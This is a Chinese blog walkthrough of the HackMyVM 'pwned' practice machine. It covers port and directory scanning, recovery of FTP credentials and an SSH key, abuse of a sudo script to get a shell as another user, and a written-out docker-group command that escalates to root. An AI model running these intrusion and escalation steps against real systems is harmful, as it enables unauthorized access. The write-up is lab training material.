freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-pwned
知非 2022-04-09 09:57:40 96239
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

靶机:192.168.1.128

Kali攻击机:未知

目标:user权限和root权限

nmap -sn 192.168.1.0/24

1649469107_6250e6b30d201abb0db2c.png!small?1649469109581

nmap -A -p1-65535 192.168.1.3

1649469112_6250e6b83d3c47b02746e.png!small?1649469115101

开启了21端口,22端口和80端口:

但是21端口下存在无匿名登录。

漏洞利用阶段

访问下80端口:

http://192.168.1.3/

1649469148_6250e6dc0f82cbf69b5a6.png!small?1649469150503

查看源代码:

1649469153_6250e6e18feab49a30b37.png!small?1649469155990

有个NOTE,??

I forgot to add this on last note

You are pretty smart as i thought

so here i left it for you

She sings very well. l loved it

先搞下目录扫描:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.3/ -x txt,php,html,log,zip

1649469159_6250e6e7985490ad308ab.png!small?1649469162193

http://192.168.1.3/robots.txt

1649469177_6250e6f975c940caa0d5e.png!small?1649469179855

1649469182_6250e6fe1c52674946d31.png!small?1649469184556

http://192.168.1.3/nothing/

1649469187_6250e703975715c52f157.png!small?1649469190098

1649469192_6250e70897a4755bb43ba.png!small?1649469194990

http://192.168.1.3/hidden_text/

1649469201_6250e71146bf7dd607b84.png!small?1649469203697

这个有用,这是个字典文件!!

http://192.168.1.3/hidden_text/secret.dic

目录字典:

1649469212_6250e71c3924975a8dcca.png!small?1649469214602

下载下来:

1649469219_6250e7234b23bcadb6f38.png!small?1649469221836

继续目录扫描:

wfuzz -c --hc=404 -w secret.dic -u http://192.168.1.3/FUZZ

1649469229_6250e72d3f00293ef3fdc.png!small?1649469231757

http://192.168.1.3/pwned.vuln/

1649469235_6250e73370d1d663fad86.png!small?1649469237872

查看下源代码:

1649469243_6250e73b87cda2c482051.png!small?1649469245911

这里有一个ftp的用户名和密码:

用户名:ftpuser

密码:B0ss_B!TcH

登录下ftp看看:有两个文件,下载下来看看!

1649469253_6250e7459e2d86543235f.png!small?1649469256203

这里有个用户名:ariana

1649469260_6250e74cd472f6faaf31f.png!small?1649469263277

登录密钥,我们用上面的用户名和下面的密钥进行登录!

1649469266_6250e752676cd696affd8.png!small?1649469269244

获取第一个用户:

1649469271_6250e757d4e7aeacb2688.png!small?1649469274358

查询当前用户情况:

1649469276_6250e75c27f7e44d2809c.png!small?1649469278651

1649469280_6250e760ebe086d6842a7.png!small?1649469283656

获取了第一个flag:

fb8*********************82140

权限提升阶段

接下来需要提权到root!!!

我们查询下当前用户的sudo权限!

1649469314_6250e782301caa8081c30.png!small?1649469316627

有一个脚本能有用户selena执行,看下脚本的内容!!

1649469319_6250e787021934027d33b.png!small?1649469321459

看以上两个框,读取message写入msg参数,msg参数写入/dev/null!!这里输入bash反弹selena的bash!

1649469324_6250e78cee3a7dcbb18ce.png!small?1649469327535

切换为交互式shell!!

python3 -c 'import pty; pty.spawn("/bin/bash")'

1649469332_6250e79491ea95899b4f6.png!small?1649469335236

我们能看到以上的用户属于用户组docker,我们可以基于此处进行提权到root!!

可以基于以下链接进行提权:

https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#docker-group

执行以下两条命令进行提权:

docker image list

docker run -it --rm -v /:/mnt alpine chroot /mnt bash

1649469338_6250e79aad2edb1f2d328.png!small?1649469341232

最后的flag:

1649469344_6250e7a034cdd01dafe13.png!small?1649469346809

cat root.txt

4d4098d********************046fd7c

后记

大佬关于docker提权命令的解释:

总体来说,我们执行的命令是在镜像alpine上开启了一个交互式的bash。然而,我们也把用户的root文件系统挂载到/mnt文件夹上。下一步,我把root切换到/mnt上。因此,用户的目录结构和容器是一致的,这让我们可以有效的进入到容器中。因此,我们可以看到root用户属于容器用户e91e385b0673,而不是用户pwned。但是由于我们已经挂载文件系统和把root切换到/mnt,我们能看到文件结构就像用户主机以上。同时当前的root用户已经完全接入到容器。所以,我们能以容器的root用户执行命令。但是我们能看到用户实际的改变。如果你删除了命令中的“chroot/mnt”,你就会看到容器的文件系统。然后,当你进去/mnt目录,你就会看到主机的文件系统。

# 渗透测试 # web安全 # CTF # 靶场平台 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-warez
2022-04-27
文章目录